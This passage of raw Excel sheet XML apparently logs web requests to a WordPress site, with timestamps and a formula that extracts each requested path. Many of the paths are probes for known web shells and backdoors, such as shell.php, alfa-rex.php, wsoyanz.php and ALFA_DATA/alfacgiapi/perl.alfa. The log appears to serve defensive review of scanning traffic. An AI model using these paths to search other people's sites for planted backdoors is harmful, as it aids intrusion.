      <c r="E4485" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4486" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4486" s="1">
        <v>45184.124305555553</v>
      </c>
      <c r="B4486" t="s">
        <v>1409</v>
      </c>
      <c r="C4486" t="s">
        <v>1559</v>
      </c>
      <c r="D4486" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E4486" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4487" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4487" s="1">
        <v>45184.124201388891</v>
      </c>
      <c r="B4487" t="s">
        <v>1409</v>
      </c>
      <c r="C4487" t="s">
        <v>1559</v>
      </c>
      <c r="D4487" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E4487" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4488" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4488" s="1">
        <v>45184.078796296293</v>
      </c>
      <c r="B4488" t="s">
        <v>4</v>
      </c>
      <c r="C4488" t="s">
        <v>5</v>
      </c>
      <c r="D4488" t="str">
        <f t="shared" si="70"/>
        <v/>
      </c>
      <c r="E4488" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4489" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4489" s="1">
        <v>45184.076932870368</v>
      </c>
      <c r="B4489" t="s">
        <v>1560</v>
      </c>
      <c r="C4489" t="s">
        <v>323</v>
      </c>
      <c r="D4489" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/inputs.php</v>
      </c>
      <c r="E4489" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4490" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4490" s="1">
        <v>45184.076736111114</v>
      </c>
      <c r="B4490" t="s">
        <v>1560</v>
      </c>
      <c r="C4490" t="s">
        <v>323</v>
      </c>
      <c r="D4490" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/inputs.php</v>
      </c>
      <c r="E4490" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4491" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4491" s="1">
        <v>45183.832777777781</v>
      </c>
      <c r="B4491" t="s">
        <v>1292</v>
      </c>
      <c r="C4491" t="s">
        <v>298</v>
      </c>
      <c r="D4491" t="str">
        <f t="shared" si="70"/>
        <v>inputs.php</v>
      </c>
      <c r="E4491" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4492" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4492" s="1">
        <v>45183.832511574074</v>
      </c>
      <c r="B4492" t="s">
        <v>1292</v>
      </c>
      <c r="C4492" t="s">
        <v>1561</v>
      </c>
      <c r="D4492" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/themes/themes.php</v>
      </c>
      <c r="E4492" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4493" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4493" s="1">
        <v>45183.83221064815</v>
      </c>
      <c r="B4493" t="s">
        <v>1292</v>
      </c>
      <c r="C4493" t="s">
        <v>317</v>
      </c>
      <c r="D4493" t="str">
        <f t="shared" si="70"/>
        <v>simple.php</v>
      </c>
      <c r="E4493" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4494" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4494" s="1">
        <v>45183.831944444442</v>
      </c>
      <c r="B4494" t="s">
        <v>1292</v>
      </c>
      <c r="C4494" t="s">
        <v>353</v>
      </c>
      <c r="D4494" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4494" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4495" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4495" s="1">
        <v>45183.65152777778</v>
      </c>
      <c r="B4495" t="s">
        <v>1562</v>
      </c>
      <c r="C4495" t="s">
        <v>5</v>
      </c>
      <c r="D4495" t="str">
        <f t="shared" si="70"/>
        <v/>
      </c>
      <c r="E4495" t="s">
        <v>1563</v>
      </c>
    </row>
    <row r="4496" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4496" s="1">
        <v>45183.627974537034</v>
      </c>
      <c r="B4496" t="s">
        <v>1520</v>
      </c>
      <c r="C4496" t="s">
        <v>323</v>
      </c>
      <c r="D4496" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/inputs.php</v>
      </c>
      <c r="E4496" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4497" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4497" s="1">
        <v>45183.627696759257</v>
      </c>
      <c r="B4497" t="s">
        <v>1520</v>
      </c>
      <c r="C4497" t="s">
        <v>323</v>
      </c>
      <c r="D4497" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/inputs.php</v>
      </c>
      <c r="E4497" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4498" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4498" s="1">
        <v>45183.61954861111</v>
      </c>
      <c r="B4498" t="s">
        <v>1564</v>
      </c>
      <c r="C4498" t="s">
        <v>323</v>
      </c>
      <c r="D4498" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/inputs.php</v>
      </c>
      <c r="E4498" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4499" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4499" s="1">
        <v>45183.619317129633</v>
      </c>
      <c r="B4499" t="s">
        <v>1564</v>
      </c>
      <c r="C4499" t="s">
        <v>323</v>
      </c>
      <c r="D4499" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/inputs.php</v>
      </c>
      <c r="E4499" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4500" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4500" s="1">
        <v>45183.021608796298</v>
      </c>
      <c r="B4500" t="s">
        <v>1292</v>
      </c>
      <c r="C4500" t="s">
        <v>317</v>
      </c>
      <c r="D4500" t="str">
        <f t="shared" si="70"/>
        <v>simple.php</v>
      </c>
      <c r="E4500" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4501" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4501" s="1">
        <v>45182.949282407404</v>
      </c>
      <c r="B4501" t="s">
        <v>1295</v>
      </c>
      <c r="C4501" t="s">
        <v>373</v>
      </c>
      <c r="D4501" t="str">
        <f t="shared" si="70"/>
        <v>simple.php</v>
      </c>
      <c r="E4501" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4502" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4502" s="1">
        <v>45182.949178240742</v>
      </c>
      <c r="B4502" t="s">
        <v>1295</v>
      </c>
      <c r="C4502" t="s">
        <v>358</v>
      </c>
      <c r="D4502" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/plugins/core-plugin/include.php</v>
      </c>
      <c r="E4502" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4503" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4503" s="1">
        <v>45182.947083333333</v>
      </c>
      <c r="B4503" t="s">
        <v>1292</v>
      </c>
      <c r="C4503" t="s">
        <v>373</v>
      </c>
      <c r="D4503" t="str">
        <f t="shared" si="70"/>
        <v>simple.php</v>
      </c>
      <c r="E4503" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4504" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4504" s="1">
        <v>45182.146701388891</v>
      </c>
      <c r="B4504" t="s">
        <v>1565</v>
      </c>
      <c r="C4504" t="s">
        <v>1566</v>
      </c>
      <c r="D4504" t="str">
        <f t="shared" si="70"/>
        <v>ccx/aa/</v>
      </c>
      <c r="E4504" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4505" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4505" s="1">
        <v>45182.146377314813</v>
      </c>
      <c r="B4505" t="s">
        <v>1565</v>
      </c>
      <c r="C4505" t="s">
        <v>1566</v>
      </c>
      <c r="D4505" t="str">
        <f t="shared" si="70"/>
        <v>ccx/aa/</v>
      </c>
      <c r="E4505" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4506" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4506" s="1">
        <v>45182.146157407406</v>
      </c>
      <c r="B4506" t="s">
        <v>1565</v>
      </c>
      <c r="C4506" t="s">
        <v>1567</v>
      </c>
      <c r="D4506" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/wp-links.php</v>
      </c>
      <c r="E4506" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4507" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4507" s="1">
        <v>45181.933379629627</v>
      </c>
      <c r="B4507" t="s">
        <v>1564</v>
      </c>
      <c r="C4507" t="s">
        <v>298</v>
      </c>
      <c r="D4507" t="str">
        <f t="shared" si="70"/>
        <v>inputs.php</v>
      </c>
      <c r="E4507" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4508" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4508" s="1">
        <v>45181.933194444442</v>
      </c>
      <c r="B4508" t="s">
        <v>1564</v>
      </c>
      <c r="C4508" t="s">
        <v>298</v>
      </c>
      <c r="D4508" t="str">
        <f t="shared" si="70"/>
        <v>inputs.php</v>
      </c>
      <c r="E4508" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4509" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4509" s="1">
        <v>45181.788865740738</v>
      </c>
      <c r="B4509" t="s">
        <v>1292</v>
      </c>
      <c r="C4509" t="s">
        <v>317</v>
      </c>
      <c r="D4509" t="str">
        <f t="shared" si="70"/>
        <v>simple.php</v>
      </c>
      <c r="E4509" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4510" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4510" s="1">
        <v>45181.705613425926</v>
      </c>
      <c r="B4510" t="s">
        <v>1564</v>
      </c>
      <c r="C4510" t="s">
        <v>298</v>
      </c>
      <c r="D4510" t="str">
        <f t="shared" si="70"/>
        <v>inputs.php</v>
      </c>
      <c r="E4510" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4511" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4511" s="1">
        <v>45181.705208333333</v>
      </c>
      <c r="B4511" t="s">
        <v>1564</v>
      </c>
      <c r="C4511" t="s">
        <v>298</v>
      </c>
      <c r="D4511" t="str">
        <f t="shared" si="70"/>
        <v>inputs.php</v>
      </c>
      <c r="E4511" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4512" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4512" s="1">
        <v>45181.033831018518</v>
      </c>
      <c r="B4512" t="s">
        <v>1568</v>
      </c>
      <c r="C4512" t="s">
        <v>1489</v>
      </c>
      <c r="D4512" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/plugins/envato-market/inc/class-envato-market-api.php</v>
      </c>
      <c r="E4512" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4513" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4513" s="1">
        <v>45181.033784722225</v>
      </c>
      <c r="B4513" t="s">
        <v>1568</v>
      </c>
      <c r="C4513" t="s">
        <v>1490</v>
      </c>
      <c r="D4513" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/images/install.php</v>
      </c>
      <c r="E4513" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4514" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4514" s="1">
        <v>45181.033750000002</v>
      </c>
      <c r="B4514" t="s">
        <v>1568</v>
      </c>
      <c r="C4514" t="s">
        <v>1516</v>
      </c>
      <c r="D4514" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/images/moon.php</v>
      </c>
      <c r="E4514" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4515" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4515" s="1">
        <v>45181.033715277779</v>
      </c>
      <c r="B4515" t="s">
        <v>1568</v>
      </c>
      <c r="C4515" t="s">
        <v>1144</v>
      </c>
      <c r="D4515" t="str">
        <f t="shared" si="70"/>
        <v>.well-known/acme-challenge/moon.php</v>
      </c>
      <c r="E4515" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4516" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4516" s="1">
        <v>45181.033680555556</v>
      </c>
      <c r="B4516" t="s">
        <v>1568</v>
      </c>
      <c r="C4516" t="s">
        <v>1508</v>
      </c>
      <c r="D4516" t="str">
        <f t="shared" si="70"/>
        <v>cgi-bin/moon.php</v>
      </c>
      <c r="E4516" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4517" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4517" s="1">
        <v>45181.033645833333</v>
      </c>
      <c r="B4517" t="s">
        <v>1568</v>
      </c>
      <c r="C4517" t="s">
        <v>1515</v>
      </c>
      <c r="D4517" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/js/widgets/moon.php</v>
      </c>
      <c r="E4517" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4518" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4518" s="1">
        <v>45181.033599537041</v>
      </c>
      <c r="B4518" t="s">
        <v>1568</v>
      </c>
      <c r="C4518" t="s">
        <v>1514</v>
      </c>
      <c r="D4518" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/maint/moon.php</v>
      </c>
      <c r="E4518" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4519" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4519" s="1">
        <v>45181.033564814818</v>
      </c>
      <c r="B4519" t="s">
        <v>1568</v>
      </c>
      <c r="C4519" t="s">
        <v>1494</v>
      </c>
      <c r="D4519" t="str">
        <f t="shared" si="70"/>
        <v>install.php</v>
      </c>
      <c r="E4519" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4520" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4520" s="1">
        <v>45181.033530092594</v>
      </c>
      <c r="B4520" t="s">
        <v>1568</v>
      </c>
      <c r="C4520" t="s">
        <v>1495</v>
      </c>
      <c r="D4520" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/patior/</v>
      </c>
      <c r="E4520" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4521" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4521" s="1">
        <v>45181.033495370371</v>
      </c>
      <c r="B4521" t="s">
        <v>1568</v>
      </c>
      <c r="C4521" t="s">
        <v>390</v>
      </c>
      <c r="D4521" t="str">
        <f t="shared" si="70"/>
        <v>dropdown.php</v>
      </c>
      <c r="E4521" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4522" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4522" s="1">
        <v>45181.033460648148</v>
      </c>
      <c r="B4522" t="s">
        <v>1568</v>
      </c>
      <c r="C4522" t="s">
        <v>1496</v>
      </c>
      <c r="D4522" t="str">
        <f t="shared" si="70"/>
        <v>.well-known/admin.php</v>
      </c>
      <c r="E4522" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4523" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4523" s="1">
        <v>45181.033425925925</v>
      </c>
      <c r="B4523" t="s">
        <v>1568</v>
      </c>
      <c r="C4523" t="s">
        <v>959</v>
      </c>
      <c r="D4523" t="str">
        <f t="shared" si="70"/>
        <v>radio.php</v>
      </c>
      <c r="E4523" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4524" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4524" s="1">
        <v>45181.033391203702</v>
      </c>
      <c r="B4524" t="s">
        <v>1568</v>
      </c>
      <c r="C4524" t="s">
        <v>566</v>
      </c>
      <c r="D4524" t="str">
        <f t="shared" si="70"/>
        <v>cjfuns.php</v>
      </c>
      <c r="E4524" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4525" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4525" s="1">
        <v>45181.033310185187</v>
      </c>
      <c r="B4525" t="s">
        <v>1568</v>
      </c>
      <c r="C4525" t="s">
        <v>1142</v>
      </c>
      <c r="D4525" t="str">
        <f t="shared" si="70"/>
        <v>.well-known/acme-challenge/xmrlpc.php</v>
      </c>
      <c r="E4525" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4526" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4526" s="1">
        <v>45181.033275462964</v>
      </c>
      <c r="B4526" t="s">
        <v>1568</v>
      </c>
      <c r="C4526" t="s">
        <v>1098</v>
      </c>
      <c r="D4526" t="str">
        <f t="shared" si="70"/>
        <v>.well-known/acme-challenge/cloud.php</v>
      </c>
      <c r="E4526" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4527" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4527" s="1">
        <v>45181.033206018517</v>
      </c>
      <c r="B4527" t="s">
        <v>1568</v>
      </c>
      <c r="C4527" t="s">
        <v>1497</v>
      </c>
      <c r="D4527" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/plugins/seoo/wsoyanz.php</v>
      </c>
      <c r="E4527" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4528" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4528" s="1">
        <v>45181.033148148148</v>
      </c>
      <c r="B4528" t="s">
        <v>1568</v>
      </c>
      <c r="C4528" t="s">
        <v>1498</v>
      </c>
      <c r="D4528" t="str">
        <f t="shared" si="70"/>
        <v>alfa-rex.php</v>
      </c>
      <c r="E4528" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4529" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4529" s="1">
        <v>45181.033113425925</v>
      </c>
      <c r="B4529" t="s">
        <v>1568</v>
      </c>
      <c r="C4529" t="s">
        <v>889</v>
      </c>
      <c r="D4529" t="str">
        <f t="shared" si="70"/>
        <v>shell.php</v>
      </c>
      <c r="E4529" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4530" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4530" s="1">
        <v>45181.033067129632</v>
      </c>
      <c r="B4530" t="s">
        <v>1568</v>
      </c>
      <c r="C4530" t="s">
        <v>1499</v>
      </c>
      <c r="D4530" t="str">
        <f t="shared" si="70"/>
        <v>wp-info.php</v>
      </c>
      <c r="E4530" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4531" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4531" s="1">
        <v>45181.033032407409</v>
      </c>
      <c r="B4531" t="s">
        <v>1568</v>
      </c>
      <c r="C4531" t="s">
        <v>1500</v>
      </c>
      <c r="D4531" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647</v>
      </c>
      <c r="E4531" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4532" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4532" s="1">
        <v>45181.032986111109</v>
      </c>
      <c r="B4532" t="s">
        <v>1568</v>
      </c>
      <c r="C4532" t="s">
        <v>41</v>
      </c>
      <c r="D4532" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4532" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4533" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4533" s="1">
        <v>45181.032951388886</v>
      </c>
      <c r="B4533" t="s">
        <v>1568</v>
      </c>
      <c r="C4533" t="s">
        <v>695</v>
      </c>
      <c r="D4533" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E4533" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4534" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4534" s="1">
        <v>45181.032916666663</v>
      </c>
      <c r="B4534" t="s">
        <v>1568</v>
      </c>
      <c r="C4534" t="s">
        <v>767</v>
      </c>
      <c r="D4534" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/plugins/seoplugins/db.php?u</v>
      </c>
      <c r="E4534" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4535" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4535" s="1">
        <v>45181.032881944448</v>
      </c>
      <c r="B4535" t="s">
        <v>1568</v>
      </c>
      <c r="C4535" t="s">
        <v>694</v>
      </c>
      <c r="D4535" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/plugins/seoplugins/mar.php</v>
      </c>
      <c r="E4535" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4536" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4536" s="1">
        <v>45181.032847222225</v>
      </c>
      <c r="B4536" t="s">
        <v>1568</v>
      </c>
      <c r="C4536" t="s">
        <v>1501</v>
      </c>
      <c r="D4536" t="str">
        <f t="shared" si="70"/>
        <v>ccx/</v>
      </c>
      <c r="E4536" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4537" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4537" s="1">
        <v>45181.032824074071</v>
      </c>
      <c r="B4537" t="s">
        <v>1568</v>
      </c>
      <c r="C4537" t="s">
        <v>1126</v>
      </c>
      <c r="D4537" t="str">
        <f t="shared" si="70"/>
        <v>repeater.php</v>
      </c>
      <c r="E4537" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4538" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4538" s="1">
        <v>45181.032789351855</v>
      </c>
      <c r="B4538" t="s">
        <v>1568</v>
      </c>
      <c r="C4538" t="s">
        <v>1502</v>
      </c>
      <c r="D4538" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/css/colors/coffee/about.php</v>
      </c>
      <c r="E4538" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4539" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4539" s="1">
        <v>45181.032719907409</v>
      </c>
      <c r="B4539" t="s">
        <v>1568</v>
      </c>
      <c r="C4539" t="s">
        <v>1503</v>
      </c>
      <c r="D4539" t="str">
        <f t="shared" si="70"/>
        <v>wp-admin/css/colors/blue/about.php</v>
      </c>
      <c r="E4539" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4540" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4540" s="1">
        <v>45181.032685185186</v>
      </c>
      <c r="B4540" t="s">
        <v>1568</v>
      </c>
      <c r="C4540" t="s">
        <v>1504</v>
      </c>
      <c r="D4540" t="str">
        <f t="shared" si="70"/>
        <v>wp-includes/blocks/table/int/tmpl/</v>
      </c>
      <c r="E4540" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4541" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4541" s="1">
        <v>45181.032638888886</v>
      </c>
      <c r="B4541" t="s">
        <v>1568</v>
      </c>
      <c r="C4541" t="s">
        <v>1350</v>
      </c>
      <c r="D4541" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/plugins/linkpreview/db.php?u</v>
      </c>
      <c r="E4541" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4542" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4542" s="1">
        <v>45181.032592592594</v>
      </c>
      <c r="B4542" t="s">
        <v>1568</v>
      </c>
      <c r="C4542" t="s">
        <v>1432</v>
      </c>
      <c r="D4542" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/themes/pridmag/db.php?u</v>
      </c>
      <c r="E4542" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4543" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4543" s="1">
        <v>45180.814502314817</v>
      </c>
      <c r="B4543" t="s">
        <v>1295</v>
      </c>
      <c r="C4543" t="s">
        <v>1158</v>
      </c>
      <c r="D4543" t="str">
        <f t="shared" si="70"/>
        <v>wp-links.php</v>
      </c>
      <c r="E4543" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4544" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4544" s="1">
        <v>45180.814340277779</v>
      </c>
      <c r="B4544" t="s">
        <v>1295</v>
      </c>
      <c r="C4544" t="s">
        <v>317</v>
      </c>
      <c r="D4544" t="str">
        <f t="shared" si="70"/>
        <v>simple.php</v>
      </c>
      <c r="E4544" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4545" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4545" s="1">
        <v>45180.814039351855</v>
      </c>
      <c r="B4545" t="s">
        <v>1295</v>
      </c>
      <c r="C4545" t="s">
        <v>1529</v>
      </c>
      <c r="D4545" t="str">
        <f t="shared" si="70"/>
        <v>wp-content/style-css.php</v>
      </c>
      <c r="E4545" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4546" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4546" s="1">
        <v>45180.311412037037</v>
      </c>
      <c r="B4546" t="s">
        <v>1569</v>
      </c>
      <c r="C4546" t="s">
        <v>41</v>
      </c>
      <c r="D4546" t="str">
        <f t="shared" ref="D4546:D4609" si="71">MID(C4546,FIND("#", SUBSTITUTE(C4546, "/", "#", 3))+1,LEN(C4546)-FIND("#", SUBSTITUTE(C4546, "/", "#", 3))+1)</f>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4546" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4547" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4547" s="1">
        <v>45180.311400462961</v>
      </c>
      <c r="B4547" t="s">
        <v>1569</v>
      </c>
      <c r="C4547" t="s">
        <v>1570</v>
      </c>
      <c r="D4547" t="str">
        <f t="shared" si="71"/>
        <v>hmmnpxmb.php?Fox=d3wL7</v>
      </c>
      <c r="E4547" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4548" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4548" s="1">
        <v>45180.311307870368</v>
      </c>
      <c r="B4548" t="s">
        <v>1569</v>
      </c>
      <c r="C4548" t="s">
        <v>43</v>
      </c>
      <c r="D4548" t="str">
        <f t="shared" si="71"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4548" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4549" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4549" s="1">
        <v>45180.311296296299</v>
      </c>
      <c r="B4549" t="s">
        <v>1569</v>
      </c>
      <c r="C4549" t="s">
        <v>41</v>
      </c>
      <c r="D4549" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4549" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4550" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4550" s="1">
        <v>45180.311273148145</v>
      </c>
      <c r="B4550" t="s">
        <v>1569</v>
      </c>
      <c r="C4550" t="s">
        <v>45</v>
      </c>
      <c r="D4550" t="str">
        <f t="shared" si="71"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4550" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4551" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4551" s="1">
        <v>45180.311215277776</v>
      </c>
      <c r="B4551" t="s">
        <v>1569</v>
      </c>
      <c r="C4551" t="s">
        <v>41</v>
      </c>
      <c r="D4551" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E4551" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4552" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4552" s="1">
        <v>45180.311192129629</v>
      </c>
      <c r="B4552" t="s">
        <v>1569</v>
      </c>
      <c r="C4552" t="s">
        <v>43</v>
      </c>
      <c r="D4552" t="str">
        <f t="shared" si="71"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4552" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4553" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4553" s="1">
        <v>45180.311180555553</v>
      </c>
      <c r="B4553" t="s">
        <v>1569</v>
      </c>
      <c r="C4553" t="s">
        <v>46</v>
      </c>
      <c r="D4553" t="str">
        <f t="shared" si="71"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4553" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4554" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4554" s="1">
        <v>45180.146423611113</v>
      </c>
      <c r="B4554" t="s">
        <v>1295</v>
      </c>
      <c r="C4554" t="s">
        <v>1571</v>
      </c>
      <c r="D4554" t="str">
        <f t="shared" si="71"/>
        <v>wp-links.php</v>
      </c>
      <c r="E4554" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4555" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4555" s="1">
        <v>45180.146354166667</v>
      </c>
      <c r="B4555" t="s">
        <v>1295</v>
      </c>
      <c r="C4555" t="s">
        <v>373</v>
      </c>
      <c r="D4555" t="str">
        <f t="shared" si="71"/>
        <v>simple.php</v>
      </c>
      <c r="E4555" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4556" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4556" s="1">
        <v>45180.146134259259</v>
      </c>
      <c r="B4556" t="s">
        <v>1295</v>
      </c>
      <c r="C4556" t="s">
        <v>1525</v>
      </c>
      <c r="D4556" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/style-css.php</v>
      </c>
      <c r="E4556" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4557" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4557" s="1">
        <v>45180.038078703707</v>
      </c>
